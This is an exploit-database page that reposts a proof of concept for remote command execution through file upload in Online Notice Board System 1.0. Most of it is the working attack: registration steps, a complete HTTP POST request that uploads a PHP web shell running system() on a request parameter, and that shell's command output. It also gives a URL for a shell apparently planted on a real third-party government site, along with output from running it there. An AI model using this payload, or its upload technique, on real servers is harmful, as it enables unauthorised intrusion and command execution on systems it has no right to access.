Online Notice Board System 1.0 - Remote Command Execution (RCE) throw upload file
CVE
Category
Price
Severity
N/A
CWE-78
Not disclosed
High
Author
Risk
Exploitation Type
Date
Not specified
High
Remote
2021-08-19
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021080077 Below is a copy:
Online Notice Board System 1.0 - Remote Command Execution (RCE) throw upload file # Date: 2020-08-13
# Exploit Author: Mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14317/online-notice-board-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14317&title=Online+Notice+Board+System+in+PHP+Free+Source+Code
# Version: Version 1.0
# Category: Web Application
# Tested on: Kali Linux
#Description: allows an attacker to register and upload shell file.
#Step 1: register with this link http://localhost/onbs/index.php?option=New_user
#Step 2: Enter the information like username ,email ,data and shell file
#step 3: then go to this path /onbs/images/[email protected] /shell.php
#example :
POST /onbs/index.php?option=New_user HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------32859291944290603147363660265
Content-Length: 1705
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/onbs/index.php?option=New_user
Cookie: PHPSESSID=b7j92ccoqit6fgrbnjps3rb010
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="n"
test
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="e"
[email protected]
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="p"
[email protected]
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="mob"
966555555555
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="gen"
m
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="hob[]"
reading
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="hob[]"
singin
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="hob[]"
playing
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="img"; filename="m.php"
Content-Type: application/x-php
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="yy"
1996
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="mm"
6
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="dd"
7
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="save"
Save
-----------------------------32859291944290603147363660265--
#then you will see your shell here
#http://localhost/onbs/images/[email protected] /m.php?cmd=id
#uid=33(www-data) gid=33(www-data) groups=33(www-data)
#here website for test : http://www.sumajktccl.go.tz/onbs/
https://www.sumajktccl.go.tz/onbs/images/[email protected] /re.php?cmd=id
uid=1195(sumacclgo) gid=1188(sumacclgo) groups=1188(sumacclgo)
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum